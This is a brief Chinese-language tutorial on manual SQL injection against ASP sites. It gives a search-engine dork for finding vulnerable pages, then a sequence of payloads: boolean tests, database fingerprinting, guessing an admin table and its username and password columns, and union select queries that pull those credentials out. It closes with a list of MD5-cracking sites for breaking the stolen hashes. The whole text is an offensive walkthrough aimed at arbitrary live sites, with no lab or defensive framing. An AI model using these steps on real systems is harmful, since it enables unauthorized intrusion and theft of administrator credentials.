手工注入方法

手工注入方法：在谷歌裏輸入關鍵字：inurl:encomphonorbig.asp?id=

手工注入教程：

1、www.google.com.hk搜索：inurl:encomphonorbig.asp?id=

2、判斷注入點：and 1=1   and 1=2   存在漏洞

3、判斷數據庫：'  ;   ;--  and len('a')=1  

4、猜表：and (select count(*) from admin),顯示正常說明admin存在

5、猜字段： and (select count(username，password)from admin)，顯示正常說明username，password字段存在

6、order by 5

union select 1,2,3,4,5 from admin

看網頁中顯示第幾位可用(此處如第三位可用)

union select 1,2,username,4,5 from admin

union select 1,2,password,4,5 from admin

MD5破解：

http://www.cmd5.com

http://xmd5.org

http://md5.syue.com

gttp://md5.com.cn

gttp://md5.asia